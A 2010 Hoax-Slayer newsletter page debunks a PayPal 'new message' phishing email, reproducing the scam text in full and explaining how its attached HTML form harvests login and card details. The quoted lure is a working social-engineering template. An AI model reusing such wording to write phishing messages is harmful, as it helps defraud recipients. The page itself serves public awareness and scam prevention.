Debunking email hoaxes and exposing Internet scams since 2003!

Hoax-Slayer Logo Hoax-Slayer Logo

DividerDivider
Home    About    New Articles    RSS Feed    Subscriptions    Contact
DividerDivider


Site Navigation










Issue 103 - June 2010 - Page 10

Pages in this month's issue:
  1. Image Showing a Kayak in the Mouth of a Whale
  2. Becoming a Father or Mother Facebook Group Pedophile Warning Hoax
  3. Coca-Cola Online Promo Advance Fee Scam
  4. LeBleu Family Prayer Request Message
  5. Liquid Mountaineering Video - Walking on Water
  6. Cessna Citation Engines Damaged by Volcanic Ash Hoax
  7. Killer House Plant Warning
  8. iTunes Gift Certificate Trojan Email
  9. Russian K-7 Heavy Bomber Images
  10. Paypal New Message Phishing Scam
  11. Letter Z To Be Removed from the Alphabet Hoax
  12. Refugee Monthly Allowance From Australian Government Hoax
  13. FIFA 2010 World Cup Lottery Scam
  14. Audri King Prayer Request
  15. Distracting Beach Babes Facebook Malware Attack
  16. Michael Verster Missing Child Alert
  17. Kevin Carter Pulitzer Prize Photograph

Issue 103 Start Menu

Previous Article            Next Article

Paypal New Message Phishing Scam

Outline
Email, purporting to be a "new message" from Paypal claims that an error has been detected in the recipient's Paypal account and he or she must submit an attached form verifying his or her details or risk having the account suspended.



Brief Analysis
The email is not from Paypal. The claim that there is a problem with the recipient's account is a lie designed to trick him or her into submitting Paypal account details to Internet criminals. Any information entered on the bogus form can be collected by criminals and used to hijack the user's Paypal and credit card accounts.

Bookmark and Share
Detailed analysis and references below example.

Enter your email address to subscribe to the Hoax-Slayer Newsletter:




Scroll down to submit comments
Last updated: 1st May 2010
First published: 1st May 2010
Article written by Brett M. Christensen
About Brett Christensen and Hoax-Slayer


Example
Subject: You have a new message from PayPal !

Dear PayPal Customer,

During our regularly scheduled account maintenance and verification procedure we have detected a slight error in your PayPal online account.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)

2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please fill in all the details that are required to complete this verification process.

To do this we have attached a form to this email. Please download the form and follow the instructions on your screen. NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the "Help" link in the footer of any page.




Detailed Analysis
This email, which claims to be from popular online payment service PayPal, informs the recipient that an error has been found in his or her PayPal account and the account must therefore be verified to avoid suspension. The message instructs the recipient to fill in and submit a form attached to the email. The form asks for the user's PayPal email address and password along with credit card details and personal identity information.

However, the message is a phishing scam and certainly is not from PayPal. The claim that there is a problem with the recipient 's PayPal account is a lie designed to fool him or her into complying with the fraudulent instructions and submitting personal and financial information. All of the information submitted on the bogus form can be collected by the criminals operating the scam and subsequently used for fraud and identity theft.

Because of its high profile and because it conducts the majority of its business and transactions online, PayPal has become a favourite target of phishing scammers. Criminals constantly use and reuse a great many variations of the above scam in order to trick victims into relinquishing their sensitive personal information. While this version includes the bogus form as an attached file, others may entice the recipient into clicking a link and visiting a fraudulent website designed to resemble the genuine PayPal site. The scammers often use tricks such as address spoofing and disguised links to make their messages seem more legitimate. They may also use PayPal logos and other graphics stolen from the genuine PayPal website to further the illusion that their messages are genuine.

PayPal will never send you an unsolicited email asking you to submit account login details, bank or credit card details or other personal information such as your full name and driver's license numbers. Thus, if you receive an email that asks you to submit such details, then you should treat it with the utmost caution. If you receive such an email, do not open any attachments that may come with the email. Do not click any links in the email. PayPal has published information warning its customers about such phishing scams.

In the past it has been more common for phishing scammers to use direct links to bogus "look-a-like" websites that try to trick victims into submitting information. However, in an increasingly common ploy, the scammers now often include the fraudulent web form as an HTML email attachment. Clicking the attachment opens the bogus form in the user's web browser. The form is coded to ensure that all information entered into the form will be automatically sent to the scammers when the "Submit" button is pressed. Scammers are apparently making more use of email attachments in an attempt to get around the increasingly sophisticated anti-phishing filters now being used by modern web browsers and computer security software.

Bookmark and Share



References
Phishing Scams - Anti-Phishing Information
Phishing Scam Targets PayPal Users
Email Worm Spoofing - Spoofing Explained
Check Links in HTML Emails
PayPal Phishing Guide
Previous Article            Next Article

Issue 103 Start Menu

Pages in this month's issue:
  1. Image Showing a Kayak in the Mouth of a Whale
  2. Becoming a Father or Mother Facebook Group Pedophile Warning Hoax
  3. Coca-Cola Online Promo Advance Fee Scam
  4. LeBleu Family Prayer Request Message
  5. Liquid Mountaineering Video - Walking on Water
  6. Cessna Citation Engines Damaged by Volcanic Ash Hoax
  7. Killer House Plant Warning
  8. iTunes Gift Certificate Trojan Email
  9. Russian K-7 Heavy Bomber Images
  10. Paypal New Message Phishing Scam
  11. Letter Z To Be Removed from the Alphabet Hoax
  12. Refugee Monthly Allowance From Australian Government Hoax
  13. FIFA 2010 World Cup Lottery Scam
  14. Audri King Prayer Request
  15. Distracting Beach Babes Facebook Malware Attack
  16. Michael Verster Missing Child Alert
  17. Kevin Carter Pulitzer Prize Photograph